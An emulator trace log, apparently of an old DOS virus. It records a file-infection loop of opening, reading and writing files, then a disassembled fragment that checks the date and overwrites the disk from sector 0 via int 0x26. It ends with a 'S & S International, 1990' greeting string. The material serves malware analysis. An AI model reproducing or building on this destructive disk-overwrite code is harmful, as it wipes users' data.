2018-12-25T12:03:04.137225436Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:04.143219258Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:04.144577964Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:04.147697954Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:04.148870496Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:04.151616514Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:04.153942947Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.161391358Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.164261493Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:04.171019112Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:04.177393239Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:04.17887758Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:04.181948212Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:04.183297202Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:04.186444842Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:04.189596636Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.197256937Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.199908994Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:04.206625198Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:04.2127464Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:04.213900613Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:04.216673386Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:04.218075752Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:04.225916623Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:04.228825655Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.236956358Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.239362078Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:04.246158019Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:04.252236436Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:04.253320672Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:04.256637587Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:04.257843849Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:04.260470887Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:04.263447056Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.271044242Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.273551483Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:04.280208259Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:04.282607726Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.284199222Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.286867484Z 26 PC: 12b33 | Set disk transfer address
2018-12-25T12:03:04.287843191Z 42 PC: 12b4a | Get date 0x12b4a: cmp dx, 0x71a
0x12b4e: jne 0x12b59
0x12b50: mov ah, 0x19
0x12b52: int 0x21
0x12b54: pop cx
0x12b55: xor dx, dx
0x12b57: int 0x26
0x12b59: mov ax, 0x100
0x12b5c: jmp ax
0x12b5e: sub ch, byte ptr [0x4f43]
0x12b62: dec bp
0x12b63: add bl, ch
0x12b65: pop cx
0x12b66: nop
0x12b67: dec ax
0x12b68: insb byte ptr es:[di], dx
0x12b6a: insb byte ptr es:[di], dx
0x12b6b: outsw dx, word ptr [si]
0x12b6c: and byte ptr [di], ch
0x12b6e: and byte ptr [bp + di + 0x6f], al
2018-12-25T12:03:04.289780867Z 25 PC: 12b54 | Get default drive
2018-12-25T12:03:04.29687733Z 9 PC: 12aa2 | Display string (String= 'Hello - Copyright S & S International, 1990 ')